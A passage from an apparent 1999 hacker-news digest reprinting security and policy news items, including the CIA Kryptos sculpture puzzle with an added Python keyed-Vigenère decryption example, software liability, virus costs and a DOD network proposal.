1 In April 1997, the FBI Director met with Secretary Pena, who had taken office in March, to deliver a highly critical FBI assessment of DOE’s counterintelligence
program. In June, DOE officials briefed the Special Assistant to the President and Senior Director for Nonproliferation and Export Controls. In July, the FBI
Director and the Director of Central Intelligence expressed serious concern that DOE had not moved to implement the recommendations in the FBI report.
2 The National Counterintelligence Policy Board (NACIPB) was created by a 1994 Presidential Decision Directive to serve as the National Security Council’s
primary mechanism to develop an effective national counterintelligence program. Current core NACIPB members include senior representatives from the Director of
Central Intelligence /Central Intelligence Agency, the Federal Bureau of Investigation, the Department of Defense, the Department of State, the Department of
Justice, the military departments’ CI organizations, the National Security Council, and, as of 1997, the Department of Energy and NSA.
CHAPTER: REORGANIZATION
1 DOE, “Department of Energy First Tier Organizations, Terms of Office,” undated.
2 DOE, Field Fact Book, May 1998.
3 Unclassified organizational data provided by National Reconnaissance Office.
[End]
Conversion to HTML by JYA/Urban Deadline.
See also PDF version of Unclassified Annex: http://jya.com/pfiab-appx.pdf
@HWA
63.0 Terrorists Use the Net
~~~~~~~~~~~~~~~~~~~~~~
June 18th 1999
From HNN http://www.hackernews.com/
contributed by Anonymous
Since everyone else does it, terrorists do too. Terrorists
are using the net as a means of communication,
collaboration, and information dissemination. Sharing
technology and spreading information to followers via
the internet has become a necessary way of doing
business. Web sites are new weapons terrorists are
adding to their armory. A good quote from this article,
"We cannot just make a law that will stop them from
using it."
Computer Currents
http://www.currents.net/newstoday/99/06/15/news13.html
Daily News
Terrorism Via The Net
By Erwin Lemuel G Oliva, Metropolitan Computer Times
June 15, 1999
Almost every sector in society has exploited the Internet.
Unfortunately, not everyone has good intentions. Terrorists now
use the Internet as means of communication and collaboration,
said Mike Coldrick, a bomb technician and anti-terrorism expert
from Scotland Yard during the recent ASEAN Defense
Technology Exchange forum in Manila.
"Modern terrorists travel by jet plane, communicate to followers
by satellite telephone, and recruit and spread messages via the
Internet," Coldrick states in a paper he presented during the
forum.
Technology has changed the face of terrorist organizations.
Coldrick noted, saying that there is growing evidence that
terrorists are currently using the latest means of
communication, such as the Internet, to disseminate terrorist
literature and doctrine.
In the same way, terrorist groups also use the Internet to
transfer terrorist technology to other groups all over the world.
"Lately, the Colombian revolutionary group, FARC, have
produced stand off weapons and heavy mortars to a design very
similar to those produced by the Provisional Irish Republican
Army. No doubt this technology was passed on by
PIRA-trained Basques (separatist group from Spain). Or did the
Colombian group find it on the Internet?" asked Coldrick.
Most often terrorist groups are able to create improvised
explosive devices and other weaponry using locally available
materials. In some instances, they buy them from international
black markets. The latter, however, entails a lot of risk, said
Coldrick.
Coldrick laments that despite the advances in technology,
terrorist groups' activities are not generally monitored due to
legal issues such as privacy. "We cannot just make a law that
will stop them from using it," he said.
"It is important for people to exchange information about the
activities of terrorists," he added. The International Association
of Bomb Technicians and Investigators and the World
Explosives Ordnance Disposal (EOD) Foundation, of which
Coldrick is president, actively exchange e-mail and hold
discussion groups over the Net.
"In 41 years of my practice, I'll still find new things on the
Internet," he remarked.
@HWA
64.0 Beat the CIA at their own game? - crypto sculpture cracking
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 18th 1999
From HNN http://www.hackernews.com/
CIA Crypto Sculpture
contributed by lamer
There is an encoded sculpture in the Langley courtyard,
and now there is a public challenge to see if someone in
the general public can crack the code before the CIA
(of course, they have had a 10 year head start).
ABC News
http://www.abcnews.go.com/onair/WorldNewsTonight/wnt9990615_ciacode.html
By John Martin
ABCNEWS.com
L A N G L E Y, Va., June 15 — Behind the Central
Intelligence Agency’s headquarters, there’s a
secret message waiting to be decoded.
To the delight of its creator, artist Jim
Sanborn of Washington, the message
remains a mystery to the agency and the
hundreds of employees who relax in the
courtyard where his sculpture stands. “I
don’t know that it will ever be totally
figured out,” says Sanborn.
Only William Webster, CIA director
at the time the sculpture was erected, was
given the decoded text, and he locked it
in the office safe when he left the agency in 1991.
A Break in the Case
But finally, after all these years, there’s been a break. An
analyst at the agency has deciphered part of the message.
In fact, he’s deciphered two parts of the message.
The CIA public affairs office is quick to point out that
each employee works to unravel the puzzle on his own
time. Presumably, the agency’s computers, or those of the
code-breaking National Security Agency, could unlock the
message in a matter of hours or days.
David Stein, a 38-year-old CIA physicist, working at
home nights and weekends for about 400 hours, has
deciphered all but 97 of the letters.
This is part of what he deciphered: “They used the
earth’s magnetic field. The information was gathered and
transmitted underground to an unknown location.”
What location? If you know the code, the coordinates
are there.
“Thirty-eight degrees, 57 minutes, 6.5 seconds, north.
77 degrees, 8 minutes, 44 minutes west. ID’ed by rows,”
reads Stein. That is the approximate location of the
sculpture.
We showed retired CIA cryptographer Ed Scheidt
Stein’s work. Scheidt says Stein is on the right track. And
he should know — Scheidt is the one who taught the artist
how to encode his message.
As to the section Stein hasn’t been able to solve,
Scheidt says, “That’s still a secret.”
And that’s how the sculptor wants it. “I think it’s
important that every piece of artwork holds one’s attention
for as long as possible,” says Sanborn.
Still, after nine years, the veil has been pulled back
slightly. But the mystery continues, and the CIA says it still
wants the message deciphered, if only to show it enjoys the
challenge.
Your Turn
We invite you to try cracking the code. You can see the full
code at the bottom of this page. Mull it over and then post
your guesses on the message board above or use the board
to discuss things with fellow cryptographers. And then we
will see whether one of our readers can accomplish what
the CIA has not in nearly a decade.
Need a Hint?
We have posted a partial transcript with an interview Stein
to help you. Each day we will post a portion of what Stein
has already deciphered. Look for it at the bottom of the
yellow box.
The Full Code
Left Side
EMUFPHZLRFAXYUSDJKZLDKRNSHGNFIVJ
YQTQUXQBQVYUVLLTREVJYQTMKYRDMFD
VFPJUDEEHZWETZYVGWHKKQETGFQJNCE
GGWHKK?DQMCPFQZDQMMIAGPFXHQRLG
TIMVMZJANQLVKQEDAGDVFRPJUNGEUNA
QZGZLECGYUXUEENJTBJLBQCRTBJDFHRR
YIZETKZEMVDUFKSJHKFWHKUWQLSZFTI
HHDDDUVH?DWKBFUFPWNTDFIYCUQZERE
EVLDKFEZMOQQJLTTUGSYQPFEUNLAVIDX
FLGGTEZ?FKZBSFDQVGOGIPUFXHHDRKF
FHQNTGPUAECNUVPDJMQCLQUMUNEDFQ
ELZZVRRGKFFVOEEXBDMVPNFQXEZLGRE
DNQFMPNZGLFLPMRJQYALMGNUVPDXVKP
DQUMEBEDMHDAFMJGZNUPLGEWJLLAETG
ENDYAHROHNLSRHEOCPTEOIBIDYSHNAIA
CHTNREYULDSLLSLLNOHSNOSMRWXMNE
TPRNGATIHNRARPESLNNELEBLPIIACAE
WMTWNDITEENRAHCTENEUDRETNHAEOE
TFOLSEDTIWENHAEIOYTEYQHEENCTAYCR
EIFTBRSPAMHHEWENATAMATEGYEERLB
TEEFOASFIOTUETUAEOTOARMAEERTNRTI
BSEDDNIAAHTTMSTEWPIEROAGRIEWFEB
AECTDDHILCEIHSITEGOEAOSDDRYDLORIT
RKLMLEHAGTDHARDPNEOHMGFMFEUHE
ECDMRIPFEIMEHNLSSTTRTVDOHW?OBKR
UOXOGHULBSOLIFBBWFLRVQQPRNGKSSO
TWTQSJQSSEKZZWATJKLUDIAWINFBNYP
VTTMZFPKWGDKZXTJCDIGKUHUAUEKCAR
Right side
ABCDEFGHIJKLMNOPQRSTUVWXYZABCD
AKRYPTOSABCDEFGHIJLMNQUVWXZKRYP
BRYPTOSABCDEFGHIJLMNQUVWXZKRYPT
CYPTOSABCDEFGHIJLMNQUVWXZKRYPTO
DPTOSABCDEFGHIJLMNQUVWXZKRYPTOS
ETOSABCDEFGHIJLMNQUVWXZKRYPTOSA
FOSABCDEFGHIJLMNQUVWXZKRYPTOSAB
GSABCDEFGHIJLMNQUVWXZKRYPTOSABC
HABCDEFGHIJLMNQUVWXZKRYPTOSABCD
IBCDEFGHIJLMNQUVWXZKRYPTOSABCDE
JCDEFGHIJLMNQUVWXZKRYPTOSABCDEF
KDEFGHIJLMNQUVWXZKRYPTOSABCDEFG
LEFGHIJLMNQUVWXZKRYPTOSABCDEFGH
MFGHIJLMNQUVWXZKRYPTOSABCDEFGHI
NGHIJLMNQUVWXZKRYPTOSABCDEFGHIJ
OHIJLMNQUVWXZKRYPTOSABCDEFGHIJL
PIJLMNQUVWXZKRYPTOSABCDEFGHIJLM
QJLMNQUVWXZKRYPTOSABCDEFGHIJLMN
RLMNQUVWXZKRYPTOSABCDEFGHIJLMNQ
SMNQUVWXZKRYPTOSABCDEFGHIJLMNQU
TNQUVWXZKRYPTOSABCDEFGHIJLMNQUV
UQUVWXZKRYPTOSABCDEFGHIJLMNQUVW
VUVWXZKRYPTOSABCDEFGHIJLMNQUVWX
WVWXZKRYPTOSABCDEFGHIJLMNQUVWXZ
XWXZKRYPTOSABCDEFGHIJLMNQUVWXZK
YXZKRYPTOSABCDEFGHIJLMNQUVWXZKR
ZZKRYPTOSABCDEFGHIJLMNQUVWXZKRY
HINT OF THE DAY
“Kryptos” Completed Plaintext. Top Half.
BETWEEN SUBTLE SHADING AND THE ABSENCE OF
LIGHT LIES THE NUANCE OF ILLUSION. THEY USED
THE EARTH’S MAGNETIC FIELD. THE INFORMATION
WAS GATHERED AND TRANSMITTED UNDERGROUND
TO AN UNKNOWN LOCATION.
DOES LANGLEY KNOW ABOUT THIS? THEY SHOULD
ITS BURIED OUT THERE SOMEWHERE. ONLY WW.
THIS WAS HIS LAST MESSAGE.
THIRTY-EIGHT DEGREES FIFTY-SEVEN MINUTES SIX
POINT FIVE SECONDS NORTH SEVENTY-SEVEN
DEGREES EIGHT MINUTES FORTY-FOUR SECONDS
WEST ID BY ROWS.
(Bottom Half) SLOWLY DESPARATLY SLOWLY THE
REMAINS OF PASSAGE DEBRIS THAT ENCUMBERED
THE LOWER PART OF THE DOORWAY WAS REMOVED
WITH TREMBLING HANDS I MADE A TINY BREACH IN
THE UPPER LEFT HAND CORNER AND THEN
WIDENING THE HOLE A LITTLE I INSERTED THE
CANDLE AND PEERED IN THE HOT AIR ESCAPING
FROM THE CHANBER CAUSED THE FLAME TO
FLICKER BUT PRESENTLY DETAILS OF THE ROOM
WITHIN EMERGED FROM THE MIST. CAN YOU SEE
ANYTHINGQ?
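The right side of the sculpture printed above is a tableau: row A is the alphabet re-ordered to begin with KRYPTOS, and each following row is that keyed alphabet rotated one position further. Reading it as a keyed Vigenère (the classical "Quagmire III" construction) turns the left-side letters into the hint text. The Python below is an added example written for this issue; it is not code from ABC, the sculptor or the CIA. The article names no keyword, so the keyword PALIMPSEST used for the first 63 letters is brought in from the publicly known solution, and the pass-through of '?' characters is this example's own design choice.

```python
# Added example: keyed Vigenere ("Quagmire III") on the KRYPTOS tableau.
# The tableau rows and the left-side ciphertext are as printed above; the
# keyword PALIMPSEST is public knowledge but is NOT given in the article.

KEYED = "KRYPTOSABCDEFGHIJLMNQUVWXZ"   # content of tableau row 'A'
PLAIN = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"   # the row labels / top ruler row


def tableau_row(label: str) -> str:
    """Rebuild one 30-letter row of the right-hand side from its label.

    Row 'A' is the keyed alphabet itself; every later label rotates it one
    more position and the first four letters wrap round, as printed.
    """
    i = PLAIN.index(label.upper())
    rotated = KEYED[i:] + KEYED[:i]
    return rotated + rotated[:4]


def _shift(text: str, key: str, direction: int) -> str:
    """Shared worker: +1 encrypts, -1 decrypts, within the keyed alphabet."""
    out = []
    k = 0
    for ch in text.upper():
        if ch not in KEYED:
            # The sculpture carries a few '?' marks; this example passes them
            # through unchanged without consuming a key letter (design choice).
            out.append(ch)
            continue
        kidx = KEYED.index(key[k % len(key)])
        out.append(KEYED[(KEYED.index(ch) + direction * kidx) % 26])
        k += 1
    return "".join(out)


def encrypt(plaintext: str, key: str) -> str:
    """Locate the plaintext letter in row 'A', pick the row that begins with
    the key letter, and read the ciphertext letter at the same column."""
    return _shift(plaintext, key.upper(), +1)


def decrypt(ciphertext: str, key: str) -> str:
    """Inverse of encrypt: find the ciphertext letter in the key letter's row
    and read the plaintext letter above it in row 'A'."""
    return _shift(ciphertext, key.upper(), -1)


# First two lines of the left side as printed above (63 letters).
K1_CIPHERTEXT = "EMUFPHZLRFAXYUSDJKZLDKRNSHGNFIVJ" "YQTQUXQBQVYUVLLTREVJYQTMKYRDMFD"
K1_KEY = "PALIMPSEST"   # assumption from the public solution, not from the article


def solve_k1() -> str:
    """Decrypt the first passage of the sculpture with the public keyword."""
    return decrypt(K1_CIPHERTEXT, K1_KEY)


if __name__ == "__main__":
    print(tableau_row("A"))   # matches the first labelled row above
    print(solve_k1())         # BETWEENSUBTLESHADING...
```

Running it reproduces the tableau rows exactly and recovers the opening sentence of the hint; note that the letters on the sculpture spell the last word IQLUSION, one letter off from the transcript printed above. The keyed alphabet changes nothing about the cipher's strength: it is still a periodic substitution, so the same Kasiski period search and per-column frequency analysis that break an ordinary Vigenère break this, which is why the article can say the agency's computers could finish in hours what took a lone analyst 400 evenings.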
@HWA
65.0 Pirates of Silicon Valley
~~~~~~~~~~~~~~~~~~~~~~~~~
June 18th 1999
From HNN http://www.hackernews.com/
Pirates of Silicon Valley
contributed by Silicosis
'Pirates of Silicon Valley' airs on TNT this Sunday at
8pm. The show is supposed to detail the history of
Apple & Microsoft. While this info is going to be
plastered everywhere else, it may be worth watching (if
you have nothing better to do; after all, they are old
school hackers).
TNT
http://tnt.turner.com/movies/tntoriginals/pirates/
If you missed this show it's available on the web via
the newsgroups, not that I condone such activity - Ed ;)
@HWA
66.0 .mil hacker cartoon
~~~~~~~~~~~~~~~~~~~~
June 18th 1999
From HNN http://www.hackernews.com/
Cartoon
contributed by carole
Here is a rather funny cartoon, found in a rather
interestingly funny place.
www.nswc.navy.mil
http://www.nswc.navy.mil/ISSEC/Gif/cartoons/hacked.gif
** This url is, of course, dead now. Anyone have a copy of
the gif? I'll check PacketStorm too...
@HWA
67.0 If Software Breaks Who is Liable? .
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 21st 1999
From HNN http://www.hackernews.com/
contributed by Weld Pond
Companies that manufacture toasters, cars, and other
products are liable for defects in their goods but not
software companies. According to the license
agreements you agree to when installing software the
manufacturer is not liable for anything. Software is often
shipped with humongous problems that the
manufacturer knew about yet there is no accountability.
Boston Globe
http://www.globe.com/dailyglobe2/171/focus/You_lose_+.shtml
COMMERCE
You lose!
Cars and toasters are expected to work. But bad software is a
norm, and the industry wants to keep it that way
By Charles Palson, 06/20/99
The engine in your new car self-destructs after a five-minute drive. The
dealer later tells you the manufacturer knowingly produced the defect,
but you have to pay for a new engine anyway. That's because the
automakers convinced Congress that consumer protection laws would drive
up car prices beyond the reach of the average buyer, so the laws were
changed to exempt the companies.
Sound like B-grade fiction? Unfortunately, the answer is: not for the
American software industry. Their intention is clearly stated in the licensing
agreement displayed on your monitor when you install new software.
Clicking OK means you agree that the manufacturer bears no responsibility
for defects.
Did you find features that don't work as advertised? Truth-in-advertising
laws don't apply. Did the program erase your hard drive? So what. Did the
manufacturer have prior knowledge of 95 percent of all the defects
beforehand, the industry average? Irrelevant. You might be able to return the
product, but your time, whatever it is worth, is lost. It's the law.
But not according to some courts, which have recently declared these
licenses illegal because they contradict provisions in the Uniform Commercial
Code, the grandfather of all consumer-protection laws. The software
industry, seeing where this liability could lead, now wants to exclude itself
from the minimal consumer protections offered under the code. Its
argument? Perfect or error-free software would be either impossible or too
expensive to produce.
''Perfect'' was carefully chosen for its emotional effect. After all, everyone
knows that achieving perfection is beyond any mortal. But it's a false
argument. The Uniform Commercial Code doesn't mention anything about
perfection; it states in essence that a product should be fit for ordinary use
and conform to printed claims. If other American industries have managed to
conform to the code, why should software be any different?
Several reputable specialists this writer interviewed don't think it should be.
One of these, Ken Johnson, who is director of Minnesota's Rochester
Technology Center, a division of D.H. Andrews Inc., and who is a former
IBM software executive, is sure that software companies can produce
top-quality products.
Johnson should know. He helped manage a now legendary project that
produced the IBM AS400 computer. A huge effort at the time, the
developers delivered on schedule, and any significant defects were fixed in a
timely manner. And the price was reasonable. Actually, counting both direct
and indirect costs, the AS400 still costs significantly less than comparable
products from other companies, and it delivers more reliability.
The lesson is that, contrary to what industry spokesmen claim, high quality at
reasonable prices is indeed possible.
With a few notable exceptions, however, the industry as a whole chooses to
continue producing software riddled with defects that often make a mockery
of extravagant advertising claims.
Microsoft, for example, shows every intention of continuing the practice of
publicizing features that don't necessarily work. Not one word on the
well-known issue can be found in company president Steve Ballmer's recent
lengthy announcement that quality will take center stage. When this writer
questioned spokeswoman Marla Polenz on the issue, she couldn't find anyone
to talk about it.
Perhaps nothing more eloquently illustrates the problems in Microsoft than
the fact that it cannot readily use its own flagship business product, NT
Server, for some mission-critical applications, such as shipping, because it is
too unreliable. According to several people close to IBM and Microsoft, the
latter uses AS400s when reliability really counts. Gartner Group studies
tracking computer reliability say that average downtime for NT Servers is
more than a half-hour per day, compared with a fraction of a second for the
AS400. That's a lot of lost revenue in a year.
But it should be emphasized that this is not just a Microsoft problem. Cem
Kaner, lawyer, former software engineer, and nationally known spokesman
on software quality, stresses that the great majority of companies knowingly
issue software with substantial defects. He, along with many other observers,
estimates that software manufacturers already know 95 percent of all the
bugs when they put their programs on the market.
Why the quality gap between IBM and so many other companies?
According to Kaner, the answer in principle is simple: Product quality
sometimes takes a back seat to getting products out the door for immediate
profit. The whole story, however, is more complex. The problem starts at
the beginning of a project when managers invariably underestimate the
development time requirements by a wide margin.
When the projected completion date arrives, pressure builds from anxious
marketing and financial departments that have made commitments based on
the promised date. Often, the product is finally released under pressure
despite defects.
The nature of the problem is well known in the industry. Roger Sherman,
former Microsoft director of testing, acknowledged, for example, that bad
schedules are responsible for most quality problems.
How has IBM largely found a resolution? According to Johnson, the
operative word is experience. Lots of it. Key development personnel at
IBM have carefully worked in different capacities on many successful
projects. These people have acquired through experience the knowledge it
takes to make useful time estimates. They know it is a little more expensive
to take such necessary measures to produce the first product version, but
they also know that, in the long run, it is less expensive because the
considerable costs associated with defects drop dramatically. ''The AS400
development team created and still adheres to meticulous quality practices,''
says Johnson.
A shift to more reliable software will not be easy. In any industry described
by observers as freewheeling, young and brash, the word ''meticulous'' might
as well be Sanskrit. Computer science departments don't teach its practical
meaning, and most software developers lack even the awareness that
quality, accurate scheduling, and reasonable cost are not mutually
contradictory.
But the point remains: Optimal software quality is doable, and any
protestations to the contrary are, well, whining.
Without even the currently minimal penalties under the Uniform Commercial
Code, the industry would have even less incentive to reform itself. Indeed,
some observers, such as Mark Paulk, professor at the computer science
department of Carnegie Mellon University, believe that the code should have
stricter provisions to increase the penalties for poor software quality. If the
industry felt the pain currently only felt by consumers, the pain would be a
positive impetus for change.
This story ran on page E01 of the Boston Globe on 06/20/99.
© Copyright 1999 Globe Newspaper Company.
@HWA
68.0 Trinux Release 0.61
~~~~~~~~~~~~~~~~~~~
June 21st 1999
From HNN http://www.hackernews.com/
contributed by mdfranz
Besides upgrading to glibc2 and Linux kernel 2.2.x,
Trinux 0.61 now offers remote package loading via
wget, updated versions of many of the tools you know
and love (such as nmap and ntop) and new additions
like hping, cgichk, mns, and SAINT (well, at least the
scanners underneath, who needs the sorry Web/CGI
interface). Just like before, all on 2 floppies and without
disturbing the other operating systems on your PC. The
standard kernel now provides support for the most
common Ethernet cards and with more reliable DHCP
support, booting Trinux from your school/office PC has
never been easier.
Trinux
http://www.trinux.org
@HWA
69.0 Australia Looks to Increase Local Police Powers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 21st 1999
From HNN http://www.hackernews.com/
contributed by Code Kid
The Electronic Transactions Bill, expected to be
introduced in the Australian Parliament in the spring
session, will give local police departments more
authority when investigating computer crimes. Many
computer crimes involve computer trespass and criminal
damage neither of which has extra-territorial provisions.
This new bill will give police powers to investigate crimes
even when they originate outside their normal
jurisdictions.
The Age
http://www.theage.com.au/daily/990620/news/news11.html
Police may go after interstate
hackers
By DAVID ADAMS
The State Government is considering giving police greater
powers to investigate computer hackers operating from
interstate.
Because hacking normally involves offences of computer
trespass and criminal damage - neither of which has
extra-territorial provisions - police have limited powers to
pursue hackers who attack Victorian companies from
interstate.
Under the Draft Electronic Commerce Framework Bill,
released for public comment in December, it was
proposed that the new offences of unlawful access to
data in a computer and of damaging data in a computer
be introduced into the Victorian Crimes Act 1958.
The draft bill also provided for police in Victoria to
investigate people interstate committing the new offences
provided there was a substantial link to Victoria. The
period of public consultation ended in February. The bill,
since renamed the Electronic Transactions Bill, is
expected to be introduced in Parliament in the spring
session.
A spokesman for the Minister for Information and
Multimedia, Mr Alan Stockdale, said that he could not
disclose what was in the bill until it was presented in
Parliament. But he said there had been considerable
consultation.
The head of the Victoria Police computer crime
investigation squad, Detective Senior Sergeant David
Caldwell, said that it was less common for hackers to
operate across state borders than inside their own state.
He said that most hacking incidents in Victoria were
motivated by curiosity rather than malice but organised
gangs of hackers and individuals were known to
deliberately target companies. Reasons included revenge
or notoriety.
In one case last year, a Glen Waverley man known by
the name of ``Number Crunch'' claimed to have broken
into the computer systems of 1300 companies in all
Australian capital cities in a two-week hacking spree that
caused $130,000 damage.
Each time the man entered a company's computer
system, he left behind a message informing it of its victim
number and asking it to report the invasion to one of two
telephone numbers, those of Melbourne television
Channels 9 and 7.
Detective Senior Sergeant Caldwell said that hacking had
been identified as one of the greatest security threats
facing companies, but some companies still appeared to
have a ``false sense of security''.
Last year, a joint Victoria Police and Deloitte Touche
Tohmatsu survey found that 11 per cent of companies
failed to have any security policy in place when
connecting to the Internet.
In the poll of about 90 of Australia's largest companies,
one-third said their computer systems had been attacked
in the previous 12 months. Of those, 58 per cent were
attacked from an external source.
Sixty-four per cent of companies said that hacking was
the greatest security concern in the future.
@HWA
70.0 Aussie Gov Downloads Porn
~~~~~~~~~~~~~~~~~~~~~~~~~
June 21st 1999
From HNN http://www.hackernews.com/
contributed by Weld Pond
The Australian Protective Service, similar in function to
the US Secret Service has found that six of its members
downloaded pornography over the internet while on the
job. The Australian Defense Department is conducting
an investigation.
32 Bits Online
http://www.32bitsonline.com/news.php3?news=news/199906/nb199906175&page=1
Australian Govt Security Officers Caught Downloading Porn
Officers in the Australian Protective Service, the Federal Government's protective security agency, are being investigated
after a "routine" sweep found they had downloaded pornography from the Internet while on duty.
The Australian Defence Department is conducting the inquiry into the use of Defence Department
computers in its Canberra headquarters to download pornographic images by six officers, according to
the Australian Broadcasting Corporation (ABC).
A spokesman told the ABC that the incidents were not considered a serious breach of security but an
investigation would ensue, with all APS officers banned from using the department's Internet links while
it is conducted.
The APS is responsible for the protection of Parliament House in Canberra, the residences of the
Prime Minister and the Governor-General, foreign diplomatic missions, airport security and defense
establishments around Australia.
The use of government computers to access pornography on the Internet was highlighted recently by an
adult Website operator. The site owner publicized the Internet domain names of a number of Australian
government agencies, including the Defence Department, that regularly accessed the adult site in
protest at Australian Internet legislation that requires ISPs to block and filter access to material on the
Internet (Newsbytes, May 28, 1999).
@HWA
71.0 Software Glitch or Security Breach
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 21st 1999
From HNN http://www.hackernews.com/
contributed by Weld Pond
When all else fails claim a 'hacker' did it. After some
customers received discounts of as much as 85%,
Microworkz faxed at least one customer claiming that
their security had been breached. Later when contacted
by a reporter they denied it and claimed it was due to a
software problem.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2279360,00.html?chkpt=zdnnstop
@HWA
72.0 Viruses Cost Companies Big Dough
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 21st 1999
From HNN http://www.hackernews.com/
contributed by nvirB
In the first two quarters of 1999 viruses have costs US
businesses 7.6 billion in lost revenue. Computer
Economics of Carlsbad, California has completed a study
that says the amount can be attributed to computer
downtime and the expense of dealing with the virus
infestations.
Wired
http://www.wired.com/news/news/technology/story/20297.html
Fox Market Wire
http://foxmarketwire.com/061999/virus.sml
Computer Economics, Inc.
http://www.computereconomics.com/
Wired;
Viruses Cost Big Bucks
Wired News Report
12:20 p.m. 18.Jun.99.PDT
Businesses worldwide have lost a total of
US$7.6 billion in the first two quarters of
1999 at the hands of Melissa, the
Explore.Zip worm and other viruses, a
new study finds.
Computer Economics of Carlsbad,
California said the costs resulted from lost
productivity due to computer downtime,
and the expense of dealing with virus
attacks.
The study also predicted that the
frequency of the attacks will continue at
the current rate, and that systems
failures could be more severe.
Computer Economics polled 185 large
companies and totaled their combined
losses.
Michael Erbschloe, vice president of
research for Computer Economics, said
that companies must make an investment
in security to prevent further damage
from viruses.
"We've surveyed people in IT
organizations for the last 12 years,"
Erbschloe said. "We're constantly getting
the response that computer security is
underfunded."
-=-
Fox Market Wire;
Computer Virus Costs to Business Surge
11.09 a.m. ET (1509 GMT) June 19, 1999
NEW YORK — Computer virus and "worm" attacks on information systems
have caused businesses to lose a total of $7.6 billion in the first half of 1999 as a
result of disabled computers, a research firm said Friday.
The cost of viruses and worms — computer bugs spread by e-mail that can
cause system shutdowns — was about five times larger in the first six months of
1999 than businesses suffered during all of last year, said Computer Economics
Inc.
The most recent study was based on 185 companies representing 900,000
international users, while the 1998 survey used slightly different methodology,
researcher Michael Erbschloe said.
"The numbers probably came out low," he said. "It is a conservative number in
that not everyone tracks cost, and most companies tend to undercount and
underreport."
He said the $7.6 billion figure represented lost productivity and repair costs
reported by the company. The 1998 figure of about $1.5 billion also included
"intrusions" to corporate systems, in addition to general virus attacks.
Erbschloe said this year's high profile attacks by ExploreZip worm, which erased
computer files and caused the shutdown of some corporate e-mail systems, and
the Melissa virus, which spread quickly but did not destroy data, would only
draw more attacks.
"Hackers don't like to be outdone," he said. "And most companies are
underfunding their security efforts."
-=-
@HWA
73.0 B4B0 Issue 8 Released.
~~~~~~~~~~~~~~~~~~~~~
June 21st 1999
From HNN http://www.hackernews.com/
contributed by tip
The latest and greatest issue of B4B0 has been
released. Articles discuss issues on system/network
security, humor, as well as dementia. Their primary
focus has always been the liberation of normalcy, and
hopefully the redline youth of the world will turn the
new trend in the gospel sound.
B4B0
http://www.b4b0.org
@HWA
74.0 f41th Issue 7
~~~~~~~~~~~~~~
June 21st 1999
From HNN http://www.hackernews.com/
contributed by D4RKCYDE
D4RKCYDE have released f41th issue 7, the 3rd
installment to the magazine. This issue contains even
more than before, with in-depth articles such as '5ESS
Compact Digital Exchanges' and 'Chronus ICMP Packet
Timestamps' with much, much more.
f41th
http://darkcyde.system7.org
75.0 DOD Considers New Network
~~~~~~~~~~~~~~~~~~~~~~~~~
June 22nd 1999
From HNN http://www.hackernews.com/
contributed by dis-crete
In an effort to defend against frequent cyber attacks,
the Pentagon is considering building a new computer
network to handle e-commerce and public web pages,
cutting off existing connections to the Internet. This
follows an increase in the rate of successful attacks on
the Non-Classified Internet Protocol Router Network
(NIPRNET). While a separate network sounds like a good
idea in theory the practicalities of completely separating
NIPRNET from the Internet will not be easy.
Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0621/fcw-newsnetwork-6-21-99.html
JUNE 21, 1999
Cyberattacks spur talk of 3rd DOD network
New network would support e-commerce and public access
to DOD Web sites
BY BOB BREWIN (antenna@fcw.com)
AND DANIEL VERTON (dan_verton@fcw.com)
As part of a strategy to defend its unclassified networks against relentless
cyberattacks, the Pentagon may establish a new network to handle electronic
commerce and other interactions with the public while cutting off all other
existing connections to the Internet.
The proposal follows an increase in the rate of cyberattacks -- many stemming
from the Kosovo conflict -- on the Non-Classified Internet Protocol Router
Network (NIPRNET), through which the department transmits unclassified
information, including some tactical data, via the Internet.
Marv Langston, deputy assistant secretary of Defense for command, control,
communications and intelligence (C3I), said top DOD officials have begun
debating whether to disconnect NIPRNET from the Internet and create another
network, a so-called third layer, which would provide Internet links between
DOD and e-commerce partners and provide the public with access to military
Web pages.
The proposed strategy, under debate by DOD officials, would leave the
department with three layers of networks: the Secret Internet Protocol Router
Network, for classified information; NIPRNET, which would become a virtual
private network for internal DOD communications; and the new network,
through which the department would communicate with its business partners
and the public.
John Hamre, deputy secretary of Defense, framed the issues behind the policy
debate in stark terms last week, calling the short air campaign in Yugoslavia
against Serbia "the first cyberwar," citing Serb attacks against NATO's public
World Wide Web pages.
"We were under a cyberattack in our operations against Serbia," Hamre said at
last week's GovTechNet International Conference and Exhibition. DOD is
vulnerable to such attacks because the department "routinely operates in
commercial cyberspace" using NIPRNET, he said.
Lt. Gen. William Campbell, the Army's director for C3I, called the current
NIPRNET policy "close to madness" because it is used to actively support
military operations.
Campbell, who would like to see DOD set up the third-layer network, said the
Pentagon should not compromise the security of NIPRNET to support
e-commerce and interactions with the public. "The [e-commerce] tail should not
wag the C3I dog," Campbell said.
Tim Bass, president and chief executive officer of the security consulting firm
The Silk Road Group Ltd., said the third layer is a very wise plan.
"Denial-of-service attacks against [Internet Protocol] networks are a real threat,
and there is no disagreement that IP is highly vulnerable," Bass said.
"Furthermore, nonclassified IP access to the Internet is now a mission-critical
requirement."
Rick Forno, a security officer for Network Solutions Inc. and a former senior
security analyst at the House of Representatives' Information Resources
Security Office, also said DOD's plan is plausible. "All public-access networks
should be on a completely compartmented environment from anything [classified
"For Official Use Only"] or higher, including day-to-day routine local-area
networks," he said. If properly carried out, the policy "will be a great solution,"
Forno said.
However, the proposed strategy is not without some obstacles, DOD officials
said.
Langston, who also serves as DOD's deputy chief information officer, which
gives him a key role in the network security policy debate, said, "It is difficult to
unplug [DOD] from the Internet."
Establishing a third layer would, in essence, set up another U.S., if not global,
DOD network, which would be expensive, Langston said.
Langston advocates protecting NIPRNET by copying a Navy initiative to
secure networks with an array of technology, including intrusion-detection
systems, firewalls and encryption technology.
The Navy has developed its "defense in-depth" strategy as part of an effort to
build a secure Navywide intranet. Langston believes the strategy obviates the
need to pull the Internet plug except under the most extreme circumstances.
"The only reason to pull off the Internet is a massive cyberattack," Langston
said.
Rear Adm. John Gauss, commander of the Space and Naval Warfare Systems
